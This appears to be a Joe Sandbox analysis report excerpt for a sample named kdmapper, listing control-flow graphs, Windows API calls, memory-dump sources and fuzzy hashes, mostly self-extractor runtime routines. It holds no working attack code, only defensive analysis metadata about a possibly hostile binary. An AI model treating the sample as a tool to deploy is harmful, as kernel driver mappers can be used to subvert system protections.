                                                                                                                                                                          • Associated: 00000006.00000002.1366429596.0000000000620000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366482874.0000000000653000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.000000000065E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.0000000000665000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.0000000000682000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366563841.0000000000683000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_6_2_620000_kdmapper.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ShowWindow$CloseCodeExecuteExitHandleProcessShell_wcslen
                                                                                                                                                                          • String ID: .exe$.inf$hc$rc
                                                                                                                                                                          • API String ID: 36480843-1233218367
                                                                                                                                                                          • Opcode ID: 224246c35631be2cf74013b2be519c2c8e6aaf9929064327cf68dceaaeb8f437
                                                                                                                                                                          • Instruction ID: ca811c26afbeb40f8b27ea4054dc00c921d99322f03b0cc528a93b56c78021cc
                                                                                                                                                                          • Opcode Fuzzy Hash: 224246c35631be2cf74013b2be519c2c8e6aaf9929064327cf68dceaaeb8f437
                                                                                                                                                                          • Instruction Fuzzy Hash: 4851A170504380AADB319F24B844BEB7BE7AF42B44F04141EF9C5973A1E7B19A85CB92

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          • Executed
                                                                                                                                                                          • Not Executed
                                                                                                                                                                          control_flow_graph 911 64a95b-64a974 912 64a976-64a986 call 64ef4c 911->912 913 64a98a-64a98f 911->913 912->913 920 64a988 912->920 914 64a991-64a999 913->914 915 64a99c-64a9c0 MultiByteToWideChar 913->915 914->915 918 64a9c6-64a9d2 915->918 919 64ab53-64ab66 call 63fbbc 915->919 921 64a9d4-64a9e5 918->921 922 64aa26 918->922 920->913 925 64aa04-64aa15 call 648e06 921->925 926 64a9e7-64a9f6 call 652010 921->926 924 64aa28-64aa2a 922->924 928 64aa30-64aa43 MultiByteToWideChar 924->928 929 64ab48 924->929 925->929 939 64aa1b 925->939 926->929 938 64a9fc-64aa02 926->938 928->929 932 64aa49-64aa5b call 64af6c 928->932 933 64ab4a-64ab51 call 64abc3 929->933 940 64aa60-64aa64 932->940 933->919 942 64aa21-64aa24 938->942 939->942 940->929 943 64aa6a-64aa71 940->943 942->924 944 64aa73-64aa78 943->944 945 64aaab-64aab7 943->945 944->933 946 64aa7e-64aa80 944->946 947 64ab03 945->947 948 64aab9-64aaca 945->948 946->929 949 64aa86-64aaa0 call 64af6c 946->949 950 64ab05-64ab07 947->950 951 64aae5-64aaf6 call 648e06 948->951 952 64aacc-64aadb call 652010 948->952 949->933 966 64aaa6 949->966 956 64ab41-64ab47 call 64abc3 950->956 957 64ab09-64ab22 call 64af6c 950->957 951->956 965 64aaf8 951->965 952->956 963 64aadd-64aae3 952->963 956->929 957->956 969 64ab24-64ab2b 957->969 968 64aafe-64ab01 963->968 965->968 966->929 968->950 970 64ab67-64ab6d 969->970 971 64ab2d-64ab2e 969->971 972 64ab2f-64ab3f WideCharToMultiByte 970->972 971->972 972->956 973 64ab6f-64ab76 call 64abc3 972->973 973->933
                                                                                                                                                                          APIs
                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,00645695,00645695,?,?,?,0064ABAC,00000001,00000001,2DE85006), ref: 0064A9B5
                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,0064ABAC,00000001,00000001,2DE85006,?,?,?), ref: 0064AA3B
                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,2DE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 0064AB35
                                                                                                                                                                          • __freea.LIBCMT ref: 0064AB42
                                                                                                                                                                            • Part of subcall function 00648E06: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,0064CA2C,00000000,?,00646CBE,?,00000008,?,006491E0,?,?,?), ref: 00648E38
                                                                                                                                                                          • __freea.LIBCMT ref: 0064AB4B
                                                                                                                                                                          • __freea.LIBCMT ref: 0064AB70
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000006.00000002.1366448870.0000000000621000.00000020.00000001.01000000.00000006.sdmp, Offset: 00620000, based on PE: true
                                                                                                                                                                          • Associated: 00000006.00000002.1366429596.0000000000620000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366482874.0000000000653000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.000000000065E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.0000000000665000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.0000000000682000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366563841.0000000000683000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_6_2_620000_kdmapper.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ByteCharMultiWide__freea$AllocateHeap
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1414292761-0
                                                                                                                                                                          • Opcode ID: 5f2ea50e6fe21347169f625d5c9bb40ea6a31de2b96d72da6147046dce6a54f8
                                                                                                                                                                          • Instruction ID: c29c2074e649b149a65dc9ee753907a7d751d51b3b9b2de003e3b4d47274c963
                                                                                                                                                                          • Opcode Fuzzy Hash: 5f2ea50e6fe21347169f625d5c9bb40ea6a31de2b96d72da6147046dce6a54f8
                                                                                                                                                                          • Instruction Fuzzy Hash: EA519F72A50216BFDB258FA4CC41EEBB7ABEB45750F15462DFC04D6240EB34DC90C696

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          • Executed
                                                                                                                                                                          • Not Executed
                                                                                                                                                                          control_flow_graph 976 643b72-643b7c 977 643bee-643bf1 976->977 978 643bf3 977->978 979 643b7e-643b8c 977->979 982 643bf5-643bf9 978->982 980 643b95-643bb1 LoadLibraryExW 979->980 981 643b8e-643b91 979->981 985 643bb3-643bbc GetLastError 980->985 986 643bfa-643c00 980->986 983 643b93 981->983 984 643c09-643c0b 981->984 988 643beb 983->988 984->982 989 643be6-643be9 985->989 990 643bbe-643bd3 call 646088 985->990 986->984 987 643c02-643c03 FreeLibrary 986->987 987->984 988->977 989->988 990->989 993 643bd5-643be4 LoadLibraryExW 990->993 993->986 993->989
                                                                                                                                                                          APIs
                                                                                                                                                                          • FreeLibrary.KERNEL32(00000000,?,?,?,00643C35,?,?,00682088,00000000,?,00643D60,00000004,InitializeCriticalSectionEx,00656394,InitializeCriticalSectionEx,00000000), ref: 00643C03
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000006.00000002.1366448870.0000000000621000.00000020.00000001.01000000.00000006.sdmp, Offset: 00620000, based on PE: true
                                                                                                                                                                          • Associated: 00000006.00000002.1366429596.0000000000620000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366482874.0000000000653000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.000000000065E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.0000000000665000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.0000000000682000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366563841.0000000000683000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_6_2_620000_kdmapper.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: FreeLibrary
                                                                                                                                                                          • String ID: api-ms-
                                                                                                                                                                          • API String ID: 3664257935-2084034818
                                                                                                                                                                          • Opcode ID: 3c1ae6dbef071799aa28d708223bace20725d7b8db73d12919678d9fbe0b0803
                                                                                                                                                                          • Instruction ID: 05efc73f9973a5f86586d9c2d159970956ce1f4d74ec66f82ce2738342057608
                                                                                                                                                                          • Opcode Fuzzy Hash: 3c1ae6dbef071799aa28d708223bace20725d7b8db73d12919678d9fbe0b0803
                                                                                                                                                                          • Instruction Fuzzy Hash: 6C11A335A45731ABDB228B68DC41B9A77A6DF11BB1F250250F915EB390E770EF008AD1

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          • Executed
                                                                                                                                                                          • Not Executed
                                                                                                                                                                          control_flow_graph 994 6298e0-629901 call 63ec50 997 629903-629906 994->997 998 62990c 994->998 997->998 1000 629908-62990a 997->1000 999 62990e-62991f 998->999 1001 629921 999->1001 1002 629927-629931 999->1002 1000->999 1001->1002 1003 629933 1002->1003 1004 629936-629943 call 626edb 1002->1004 1003->1004 1007 629945 1004->1007 1008 62994b-62996a CreateFileW 1004->1008 1007->1008 1009 6299bb-6299bf 1008->1009 1010 62996c-62998e GetLastError call 62bb03 1008->1010 1012 6299c3-6299c6 1009->1012 1013 6299c8-6299cd 1010->1013 1019 629990-6299b3 CreateFileW GetLastError 1010->1019 1012->1013 1014 6299d9-6299de 1012->1014 1013->1014 1016 6299cf 1013->1016 1017 6299e0-6299e3 1014->1017 1018 6299ff-629a10 1014->1018 1016->1014 1017->1018 1020 6299e5-6299f9 SetFileTime 1017->1020 1021 629a12-629a2a call 630602 1018->1021 1022 629a2e-629a39 1018->1022 1019->1012 1023 6299b5-6299b9 1019->1023 1020->1018 1021->1022 1023->1012
                                                                                                                                                                          APIs
                                                                                                                                                                          • CreateFileW.KERNELBASE(?,?,?,00000000,00000003,08000000,00000000,?,00000000,?,?,00627760,?,00000005,?,00000011), ref: 0062995F
                                                                                                                                                                          • GetLastError.KERNEL32(?,?,00627760,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 0062996C
                                                                                                                                                                          • CreateFileW.KERNEL32(00000000,?,?,00000000,00000003,08000000,00000000,?,?,00000800,?,?,00627760,?,00000005,?), ref: 006299A2
                                                                                                                                                                          • GetLastError.KERNEL32(?,?,00627760,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 006299AA
                                                                                                                                                                          • SetFileTime.KERNEL32(00000000,00000000,000000FF,00000000,?,00627760,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 006299F9
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000006.00000002.1366448870.0000000000621000.00000020.00000001.01000000.00000006.sdmp, Offset: 00620000, based on PE: true
                                                                                                                                                                          • Associated: 00000006.00000002.1366429596.0000000000620000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366482874.0000000000653000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.000000000065E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.0000000000665000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.0000000000682000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366563841.0000000000683000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_6_2_620000_kdmapper.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: File$CreateErrorLast$Time
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1999340476-0
                                                                                                                                                                          • Opcode ID: de54ab9eada6c4101ec8b49140a4f3848b4673fc4a586431c2c73610a64194a3
                                                                                                                                                                          • Instruction ID: d2de55ccd6ea1e987d4a307e592ba076aad02157562bd464cd06b65ad2771cc9
                                                                                                                                                                          • Opcode Fuzzy Hash: de54ab9eada6c4101ec8b49140a4f3848b4673fc4a586431c2c73610a64194a3
                                                                                                                                                                          • Instruction Fuzzy Hash: 4D312530944B616FE7209F20DC46BDABB96BB84330F140B1DF9A1922C0D3B49994CFA4

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          • Executed
                                                                                                                                                                          • Not Executed
                                                                                                                                                                          control_flow_graph 1053 63abab-63abca GetClassNameW 1054 63abf2-63abf4 1053->1054 1055 63abcc-63abe1 call 631fbb 1053->1055 1057 63abf6-63abf9 SHAutoComplete 1054->1057 1058 63abff-63ac01 1054->1058 1060 63abe3-63abef FindWindowExW 1055->1060 1061 63abf1 1055->1061 1057->1058 1060->1061 1061->1054
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetClassNameW.USER32(?,?,00000050), ref: 0063ABC2
                                                                                                                                                                          • SHAutoComplete.SHLWAPI(?,00000010), ref: 0063ABF9
                                                                                                                                                                            • Part of subcall function 00631FBB: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_00011FBB,0062C116,00000000,.exe,?,?,00000800,?,?,?,00638E3C), ref: 00631FD1
                                                                                                                                                                          • FindWindowExW.USER32(?,00000000,EDIT,00000000), ref: 0063ABE9
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000006.00000002.1366448870.0000000000621000.00000020.00000001.01000000.00000006.sdmp, Offset: 00620000, based on PE: true
                                                                                                                                                                          • Associated: 00000006.00000002.1366429596.0000000000620000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366482874.0000000000653000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.000000000065E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.0000000000665000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.0000000000682000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366563841.0000000000683000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_6_2_620000_kdmapper.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: AutoClassCompareCompleteFindNameStringWindow
                                                                                                                                                                          • String ID: EDIT
                                                                                                                                                                          • API String ID: 4243998846-3080729518
                                                                                                                                                                          • Opcode ID: c61ff7aee2a56ba01451b111268b6922f6cf551659ba108ef693584e95c0c041
                                                                                                                                                                          • Instruction ID: c1799fbf30e48dedbbeb4c940a94053d31f4866d9abc56a4887325a63dd7bd0c
                                                                                                                                                                          • Opcode Fuzzy Hash: c61ff7aee2a56ba01451b111268b6922f6cf551659ba108ef693584e95c0c041
                                                                                                                                                                          • Instruction Fuzzy Hash: 85F0E23260022876DB205A649C09FDBB6AE9B46F40F484119BE41A2280DB60DA4196F6

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 0063081B: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00630836
                                                                                                                                                                            • Part of subcall function 0063081B: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,0062F2D8,Crypt32.dll,00000000,0062F35C,?,?,0062F33E,?,?,?), ref: 00630858
                                                                                                                                                                          • OleInitialize.OLE32(00000000), ref: 0063AC2F
                                                                                                                                                                          • GdiplusStartup.GDIPLUS(?,?,00000000), ref: 0063AC66
                                                                                                                                                                          • SHGetMalloc.SHELL32(00668438), ref: 0063AC70
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000006.00000002.1366448870.0000000000621000.00000020.00000001.01000000.00000006.sdmp, Offset: 00620000, based on PE: true
                                                                                                                                                                          • Associated: 00000006.00000002.1366429596.0000000000620000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366482874.0000000000653000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.000000000065E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.0000000000665000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.0000000000682000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366563841.0000000000683000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_6_2_620000_kdmapper.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: DirectoryGdiplusInitializeLibraryLoadMallocStartupSystem
                                                                                                                                                                          • String ID: riched20.dll
                                                                                                                                                                          • API String ID: 3498096277-3360196438
                                                                                                                                                                          • Opcode ID: 7c145e7abea2c358c0e51cb54311a1ed347d0dafbcc8595a2afe5c28aa9e27f5
                                                                                                                                                                          • Instruction ID: 2c5d990e2c23a4592f0aa6c31ef19a827ad9652002aeae8bf34e1ef20c4fb7de
                                                                                                                                                                          • Opcode Fuzzy Hash: 7c145e7abea2c358c0e51cb54311a1ed347d0dafbcc8595a2afe5c28aa9e27f5
                                                                                                                                                                          • Instruction Fuzzy Hash: D3F06DB1D00219ABCB10AFA9D8499EFFFFDEF84B00F00415AE811E2241CBB456058FA0

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          • Executed
                                                                                                                                                                          • Not Executed
                                                                                                                                                                          control_flow_graph 1066 63dbde-63dc09 call 63ec50 SetEnvironmentVariableW call 630371 1070 63dc0e-63dc12 1066->1070 1071 63dc36-63dc38 1070->1071 1072 63dc14-63dc18 1070->1072 1073 63dc21-63dc28 call 63048d 1072->1073 1076 63dc1a-63dc20 1073->1076 1077 63dc2a-63dc30 SetEnvironmentVariableW 1073->1077 1076->1073 1077->1071
                                                                                                                                                                          APIs
                                                                                                                                                                          • SetEnvironmentVariableW.KERNELBASE(sfxcmd,?), ref: 0063DBF4
                                                                                                                                                                          • SetEnvironmentVariableW.KERNEL32(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 0063DC30
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000006.00000002.1366448870.0000000000621000.00000020.00000001.01000000.00000006.sdmp, Offset: 00620000, based on PE: true
                                                                                                                                                                          • Associated: 00000006.00000002.1366429596.0000000000620000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366482874.0000000000653000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.000000000065E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.0000000000665000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.0000000000682000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366563841.0000000000683000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_6_2_620000_kdmapper.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: EnvironmentVariable
                                                                                                                                                                          • String ID: sfxcmd$sfxpar
                                                                                                                                                                          • API String ID: 1431749950-3493335439
                                                                                                                                                                          • Opcode ID: 01188c5dd7b706dac615433ee1877d47715b0a7344506958d6f6ffb4ab89f3af
                                                                                                                                                                          • Instruction ID: ac187c76d75108b507ba50cba57c2cc9fc18cfcfadae40971098b038cc9a0626
                                                                                                                                                                          • Opcode Fuzzy Hash: 01188c5dd7b706dac615433ee1877d47715b0a7344506958d6f6ffb4ab89f3af
                                                                                                                                                                          • Instruction Fuzzy Hash: FDF0E5B2414734ABDB302FA59C0ABFA3B9FAF04B82F041415FD8696291E6B08944D6F4

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          • Executed
                                                                                                                                                                          • Not Executed
                                                                                                                                                                          control_flow_graph 1078 629785-629791 1079 629793-62979b GetStdHandle 1078->1079 1080 62979e-6297b5 ReadFile 1078->1080 1079->1080 1081 629811 1080->1081 1082 6297b7-6297c0 call 6298bc 1080->1082 1083 629814-629817 1081->1083 1086 6297c2-6297ca 1082->1086 1087 6297d9-6297dd 1082->1087 1086->1087 1088 6297cc 1086->1088 1089 6297ee-6297f2 1087->1089 1090 6297df-6297e8 GetLastError 1087->1090 1091 6297cd-6297d7 call 629785 1088->1091 1093 6297f4-6297fc 1089->1093 1094 62980c-62980f 1089->1094 1090->1089 1092 6297ea-6297ec 1090->1092 1091->1083 1092->1083 1093->1094 1095 6297fe-629807 GetLastError 1093->1095 1094->1083 1095->1094 1097 629809-62980a 1095->1097 1097->1091
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetStdHandle.KERNEL32(000000F6), ref: 00629795
                                                                                                                                                                          • ReadFile.KERNELBASE(?,?,?,?,00000000), ref: 006297AD
                                                                                                                                                                          • GetLastError.KERNEL32 ref: 006297DF
                                                                                                                                                                          • GetLastError.KERNEL32 ref: 006297FE
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000006.00000002.1366448870.0000000000621000.00000020.00000001.01000000.00000006.sdmp, Offset: 00620000, based on PE: true
                                                                                                                                                                          • Associated: 00000006.00000002.1366429596.0000000000620000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366482874.0000000000653000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.000000000065E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.0000000000665000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.0000000000682000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366563841.0000000000683000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_6_2_620000_kdmapper.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ErrorLast$FileHandleRead
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 2244327787-0
                                                                                                                                                                          • Opcode ID: 475da24bc2550d01af6f03748e43b0b22d47f924bb2db0468e44fe4eaa23d7b4
                                                                                                                                                                          • Instruction ID: 995afa7de39fcb042357803ba12cedcc1e838450f628344a3171421face46c73
                                                                                                                                                                          • Opcode Fuzzy Hash: 475da24bc2550d01af6f03748e43b0b22d47f924bb2db0468e44fe4eaa23d7b4
                                                                                                                                                                          • Instruction Fuzzy Hash: 4711C230910B34EBDF209F24E8046AA37ABFB82761F148929F466C5390D7788E44DF71

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          • Executed
                                                                                                                                                                          • Not Executed
                                                                                                                                                                          control_flow_graph 1099 64ad34-64ad48 1100 64ad55-64ad70 LoadLibraryExW 1099->1100 1101 64ad4a-64ad53 1099->1101 1103 64ad72-64ad7b GetLastError 1100->1103 1104 64ad99-64ad9f 1100->1104 1102 64adac-64adae 1101->1102 1105 64ad7d-64ad88 LoadLibraryExW 1103->1105 1106 64ad8a 1103->1106 1107 64ada1-64ada2 FreeLibrary 1104->1107 1108 64ada8 1104->1108 1109 64ad8c-64ad8e 1105->1109 1106->1109 1107->1108 1110 64adaa-64adab 1108->1110 1109->1104 1111 64ad90-64ad97 1109->1111 1110->1102 1111->1110
                                                                                                                                                                          APIs
                                                                                                                                                                          • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,0062D710,00000000,00000000,?,0064ACDB,0062D710,00000000,00000000,00000000,?,0064AED8,00000006,FlsSetValue), ref: 0064AD66
                                                                                                                                                                          • GetLastError.KERNEL32(?,0064ACDB,0062D710,00000000,00000000,00000000,?,0064AED8,00000006,FlsSetValue,00657970,FlsSetValue,00000000,00000364,?,006498B7), ref: 0064AD72
                                                                                                                                                                          • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,0064ACDB,0062D710,00000000,00000000,00000000,?,0064AED8,00000006,FlsSetValue,00657970,FlsSetValue,00000000), ref: 0064AD80
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000006.00000002.1366448870.0000000000621000.00000020.00000001.01000000.00000006.sdmp, Offset: 00620000, based on PE: true
                                                                                                                                                                          • Associated: 00000006.00000002.1366429596.0000000000620000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366482874.0000000000653000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.000000000065E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.0000000000665000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.0000000000682000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366563841.0000000000683000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_6_2_620000_kdmapper.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: LibraryLoad$ErrorLast
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3177248105-0
                                                                                                                                                                          • Opcode ID: 3b5e144aec8c039bce62bb079829ec168ca9993ceed1c783a8ffac3c3bd042a6
                                                                                                                                                                          • Instruction ID: 1c62457221dcdad5f7bf88a50aa9df27f1956c6c3da59994a38795aaa9c17040
                                                                                                                                                                          • Opcode Fuzzy Hash: 3b5e144aec8c039bce62bb079829ec168ca9993ceed1c783a8ffac3c3bd042a6
                                                                                                                                                                          • Instruction Fuzzy Hash: AA01F736A81332BBC7228BA89C54A977B5BEF45BB3B111624F916D3790D720D90186E1
                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 006497E5: GetLastError.KERNEL32(?,00661030,00644674,00661030,?,?,00643F73,00000050,?,00661030,00000200), ref: 006497E9
                                                                                                                                                                            • Part of subcall function 006497E5: _free.LIBCMT ref: 0064981C
                                                                                                                                                                            • Part of subcall function 006497E5: SetLastError.KERNEL32(00000000,?,00661030,00000200), ref: 0064985D
                                                                                                                                                                            • Part of subcall function 006497E5: _abort.LIBCMT ref: 00649863
                                                                                                                                                                            • Part of subcall function 0064BB4E: _abort.LIBCMT ref: 0064BB80
                                                                                                                                                                            • Part of subcall function 0064BB4E: _free.LIBCMT ref: 0064BBB4
                                                                                                                                                                            • Part of subcall function 0064B7BB: GetOEMCP.KERNEL32(00000000,?,?,0064BA44,?), ref: 0064B7E6
                                                                                                                                                                          • _free.LIBCMT ref: 0064BA9F
                                                                                                                                                                          • _free.LIBCMT ref: 0064BAD5
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000006.00000002.1366448870.0000000000621000.00000020.00000001.01000000.00000006.sdmp, Offset: 00620000, based on PE: true
                                                                                                                                                                          • Associated: 00000006.00000002.1366429596.0000000000620000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366482874.0000000000653000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.000000000065E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.0000000000665000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.0000000000682000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366563841.0000000000683000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_6_2_620000_kdmapper.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: _free$ErrorLast_abort
                                                                                                                                                                          • String ID: pe
                                                                                                                                                                          • API String ID: 2991157371-324909747
                                                                                                                                                                          • Opcode ID: 16b3f14d49c1771ee0cff95a37adeb6123f3789623f76c8ed70f1a5841f96a42
                                                                                                                                                                          • Instruction ID: 60c93bb5a80001a80b905e9934adb9f8659bf2d5cc74b61d280cc3d3a34c710e
                                                                                                                                                                          • Opcode Fuzzy Hash: 16b3f14d49c1771ee0cff95a37adeb6123f3789623f76c8ed70f1a5841f96a42
                                                                                                                                                                          • Instruction Fuzzy Hash: B331B131904209AFDB14EFA8D441B9EB7E7EF40320F21549DE9049B2A2EB329E81DB54
                                                                                                                                                                          APIs
